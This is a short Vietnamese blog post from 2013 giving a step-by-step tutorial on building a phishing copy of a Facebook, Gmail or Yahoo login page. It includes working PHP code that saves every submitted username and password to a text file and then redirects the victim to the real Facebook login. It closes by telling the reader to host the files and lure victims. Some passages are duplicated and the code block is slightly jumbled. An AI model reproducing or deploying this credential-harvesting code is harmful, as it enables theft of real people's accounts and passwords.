Code Phishing
Thursday, May 9, 2013
Phishing có nghĩa là làm một website giả mạo để người dùng lầm tưởng là trang chính và cung cấp các thông tin quan trọng cho attacker như user và password.
Chúng ta cần phải có những thứ cần thiết sau:
File index.html của trang web giả mạo
- Có thể bạn muốn làm 1 trang facebook, gmail hay yahoo giả mạo. Chỉ cần xem source code của trang đăng nhập, copy và lưu lại thành "index.html".
- Chú ý phần code của nó, tìm "action=". Sau đoạn này là một URL, khi ta đăng nhập nó sẽ chuyển ta đến URL này. Vì vậy chúng ta phải chuyển hướng đến 1 nơi khác, đó là chuyển đến file "login.php" sau đây.
File Login (login.php)
Bước cuối cùng là upload 3 file này lên host của bạn, dụ victim đến và ...
Chúng ta cần phải có những thứ cần thiết sau:
- Hosting
- Domain
- Source
File index.html của trang web giả mạo
- Có thể bạn muốn làm 1 trang facebook, gmail hay yahoo giả mạo. Chỉ cần xem source code của trang đăng nhập, copy và lưu lại thành "index.html".
- Chú ý phần code của nó, tìm "action=". Sau đoạn này là một URL, khi ta đăng nhập nó sẽ chuyển ta đến URL này. Vì vậy chúng ta phải chuyển hướng đến 1 nơi khác, đó là chuyển đến file "login.php" sau đây.
File Login (login.php)
<?phpFile lưu ID và Password của victim (pswrds.txt)
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Bước cuối cùng là upload 3 file này lên host của bạn, dụ victim đến và ...
Tin liên quan
XEM TRÊN MOBILE
No comments:
Post a Comment